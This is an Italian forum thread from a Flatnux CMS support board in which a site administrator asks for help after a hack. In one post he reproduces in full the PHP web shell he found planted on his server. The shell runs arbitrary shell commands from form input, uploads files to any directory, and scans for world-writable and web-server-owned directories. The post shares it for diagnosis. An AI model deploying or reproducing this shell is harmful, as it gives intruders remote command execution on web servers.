Forum->Flatnux->Ancora problemi di sicurezza...
  
Welcome Unknown Register Help383 Users

User Message


johndorazio

0 Level 0 10

levellevellevellevellevellevellevellevellevellevel
profile mail home
Friday 12 March 2010 - 00:44

Ancora problemi di sicurezza...:
Nonostante che tengo il CMS Flatnux aggiornato all'ultima versione su server Aruba ancora subisco atti di hacking che sembrano dovuti a delle vulnerabilità del CMS. Queste vulnerabilità non le so individuare (l'hacker le ha individuate però!) per cui non so cosa segnalare, riporto invece la risposta che ho avuto dal gruppo tecnico di Aruba:


24/02/2010 9.37 - Paolo Dolci (paolo.dolci)

Gentile Cliente,

in merito alla sua segnalazione abbiamo effettuato le opportune verifiche riscontrando che nel suo sito sono stati effettuate operazioni di Hacking che han portato all'upload di file come quello da lei fornitoci.

Tale azione è stata possibile a causa di alcune vulnerabilità del Cms Flatnux e dei suoi componenti.

Al fine di evitare in futuro il ripetersi di tali eventi la invito a consultare periodicamente siti di sicurezza quali

www.secunia.com
www.securityfocus.com

dove vengono rese note le nuove vulnerabilità scoperte per script quali, in questo caso, Fakatnux e relativi moduli.
[...]
Restiamo a disposizione per eventuali chiarimenti.

Cordiali Saluti

=====================
Paolo Dolci
Technical Department
http://www.aruba.it
http://assistenza.aruba.it
n° centralino: 0575/0505
n° fax: 0575/862000
=====================



Questa non è la prima volta che avviene una cosa del genere sui siti che gestisco e questo fatto mi sconforta molto... Bisognerà approfondire i fatti di sicurezza del CMS...



speleoalex

0 Level 10 10

levellevellevellevellevellevellevellevellevellevel
profile mail
Sunday 14 March 2010 - 20:01

Re: Ancora problemi di sicurezza...:
Mi occorrerebbe sapere esattamente cosa hanno fatto sul sito, temi e moduli installati.
Potrebbe anche derivare da qualche vecchio file php rimasto sul server.
Se puoi fammi avere un backup del sito compromesso.

Alessandro




johndorazio

0 Level 0 10

levellevellevellevellevellevellevellevellevellevel
profile mail home
Monday 15 March 2010 - 00:48

Re: Ancora problemi di sicurezza...:
Non riesco ad inviarti in allegato il file sulla posta elettronica perché gmail lo blocca anche se zippato, perciò ne riporto il contenuto qui.
L'ho trovato nella cartella radice del sito http://www.parrocchiasanlino.org/ col nome "conf.inc.php". Non posso inviarti tutto il sito e a quanto mi risulta questo è l'unico file fuori posto che ho trovato, per cui non mi sembra che abbia arrecato grandi danni, infatti non sono neanche sicuro che il suo codice possa essere operativo. Però solo il fatto di trovarsi di sorpresa un file del genere è un po' sconcertante. Sono due le possibilità: iniezione remota, oppure un virus in locale che avrà avuto accesso a filezilla con le sue credenziali... Non credo che sia quest'ultimo uno perché ho fatto una buona scansione anti-virus in locale e due perché non ho trovato files del genere negli altri siti che curo (utilizzando sempre filezilla).

<html>
<head>
<title>-r@ raCrew Was Here -r@</title>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1251">
<body bgcolor="#C0C0C0">
<title></title><div align="left">
<p align="center">
<img src="http://racrew.us/ra.jpg" width="100" height="101">
<p align="center">
<font face="trebuchet ms" size="6"><b>[-r@ radio@ctive Crew Inside -r@]</b></p>

<hr>
<hr>
<div align="left"><b>
<?php
closelog( );
$user = get_current_user( );
$login = posix_getuid( );
$euid = posix_geteuid( );
$ver = phpversion( );
$gid = posix_getgid( );
if ($chdir == "") $chdir = getcwd( );
if(!$whoami)$whoami=exec("whoami");
?>
<TABLE BORDER="0" CELLPADDING="0" CELLSPACING="0">
<?php
$uname = posix_uname( );
while (list($info, $value) = each ($uname)) {
?>
<TR>
<TD align="left"><DIV STYLE="font-family: verdana; font-size: 10px;"><b><span

style="font-size: 9pt"><?= $info ?>
<span style="font-size: 9pt">:</b> <?= $value ?></span></DIV></TD>
</TR>
<?php
}
?>
<TR>
<TD align="left"><DIV STYLE="font-family: verdana; font-size: 10px;"><b>
<span style="font-size: 9pt">Info User:</b> uid=<?= $login ?>(<?= $whoami?>) euid=<?= $euid

?>(<?= $whoami?>) gid=<?= $gid ?>(<?= $whoami?>)</span></DIV></TD>
</TR>
<TR>
<TD align="left"><DIV STYLE="font-family: verdana; font-size: 10px;"><b>
<span style="font-size: 9pt">Path Awal:</b> <?= $chdir ?></span></DIV></TD>
</TR>
<TR>
<TD align="left"><DIV STYLE="font-family: verdana; font-size: 10px;"><b>
<span style="font-size: 9pt">Permisi Direktori:</b> <? if(@is_writable($chdir)){ echo "Ya";

}else{ echo "Tidak"; } ?>
</span></DIV></TD>
</TR>
<TR>
<TD align="left"><DIV STYLE="font-family: verdana; font-size: 10px;"><b>
<span style="font-size: 9pt">Serper Servis:</b> <?= "$SERVER_SOFTWARE $SERVER_VERSION"; ?>
</span></DIV></TD>
</TR>
<TR>
<TD align="left"><DIV STYLE="font-family: verdana; font-size: 10px;"><b>
<span style="font-size: 9pt">Alamat Serper:</b> <?= "$SERVER_ADDR $SERVER_NAME"; ?>
</span></DIV></TD>
</TR>
<TR>
<TD align="left"><DIV STYLE="font-family: verdana; font-size: 10px;"><b>
<span style="font-size: 9pt">Jenis Script:</b> <?= $user ?></span></DIV></TD>
</TR>
<TR>
<TD align="left"><DIV STYLE="font-family: verdana; font-size: 10px;"><b>
<span style="font-size: 9pt">Versi PHP:</b> <?= $ver ?></span></DIV></TD>
</TR>
</TABLE>
</b>
</div></font></div>

<?php

set_magic_quotes_runtime(0);

$currentWD = str_replace("\\\\","\\",$_POST['_cwd']);
$currentCMD = str_replace("\\\\","\\",$_POST['_cmd']);

$UName = `uname -a`;
$SCWD = `pwd`;
$UserID = `id`;

if( $currentWD == "" ) {
$currentWD = $SCWD;
}

if( $_POST['_act'] == "Masuk!" ) {
$currentCMD = "ls -la";
}

if( $_POST['_act'] == "IP" ) {
$currentCMD = "/sbin/ifconfig";
}

if( $_POST['_act'] == "Proses" ) {
$currentCMD = "ps -wx";
}

if( $_POST['_act'] == "777" ) {
$currentCMD = "find / -type d -perm 777";
}

if( $_POST['_act'] == "nobody" ) {
$currentCMD = "find / -user nobody -type d";
}

if( $_POST['_act'] == "apache" ) {
$currentCMD = "find / -user apache -type d";
}

if( $_POST['_act'] == "httpd" ) {
$currentCMD = "find / -user httpd -type d";
}

if( $_POST['_act'] == "www" ) {
$currentCMD = "find / -user www -type d";
}

if( $_POST['_act'] == "www-data" ) {
$currentCMD = "find / -user www-data -type d";
}

print "<form method=post enctype=\"multipart/form-data\"><hr><hr><table>";

print "<tr><td><b>Perintah:</b></td><td><input size=100 name=\"_cmd\"

value=\"".$currentCMD."\"></td>";
print "<td><input type=submit name=_act value=\"Sikat!\"></td></tr>";

print "<tr><td><b>Pindah Direktori:</b></td><td><input size=100 name=\"_cwd\"

value=\"".$currentWD."\"></td>";
print "<td><input type=submit name=_act value=\"Masuk!\"></td></tr>";

print "<tr><td><b>Aplot File:</b></td><td><input size=88 type=file name=_upl></td>";
print "<td><input type=submit name=_act value=\"Kirim!\"></td></tr>";

print "<tr><td><b>Cari :</b></td>";
print "<td><input type=submit name=_act value=\"IP\"><b> <b><input type=submit name=_act

value=\"Proses\"><b> <b><input type=submit name=_act value=\"777\"><b> <b><input type=submit

name=_act value=\"nobody\"><b> <b><input type=submit name=_act value=\"apache\"><b> <b><input

type=submit name=_act value=\"httpd\"><b> <b><input type=submit name=_act value=\"www\"><b>

<b><input type=submit name=_act value=\"www-data\"></td></tr>";

print "</table></form><hr><hr>";

$currentCMD = str_replace("\\\"","\"",$currentCMD);
$currentCMD = str_replace("\\\'","\'",$currentCMD);

if( $_POST['_act'] == "Kirim!" ) {
if( $_FILES['_upl']['error'] != UPLOAD_ERR_OK ) {
print "<center><b>Aplot file error boss!!!</b></center>";
} else {
print "<center><pre>";
system("mv ".$_FILES['_upl']['tmp_name']." ".$currentWD."/".$_FILES['_upl']['name']." 2>&1");
print "</pre><b>Aplot file sukses boss!!!</b></center>";
}
} else {
print "\n\n<!-- OUTPUT STARTS HERE -->\n<pre>\n";
$currentCMD = "cd ".$currentWD.";".$currentCMD;
system("$currentCMD 1> /tmp/cmdtemp 2>&1; cat /tmp/cmdtemp; rm
/tmp/cmdtemp");
print "\n</pre>\n<!-- OUTPUT ENDS HERE -->\n\n</center><hr><hr><center><b>Perintah

Komplit</b></center>";
}

exit;

?>




johndorazio

0 Level 0 10

levellevellevellevellevellevellevellevellevellevel
profile mail home
Monday 15 March 2010 - 01:06

Re: Ancora problemi di sicurezza...:
Googlando trovo un sito che sembra corrispondere al file che ho citato: http://racrew.info/ . Infatti in fondo riporta la stessa firma "racrew was here".
Sarà da segnalare alle autorità?

 [1]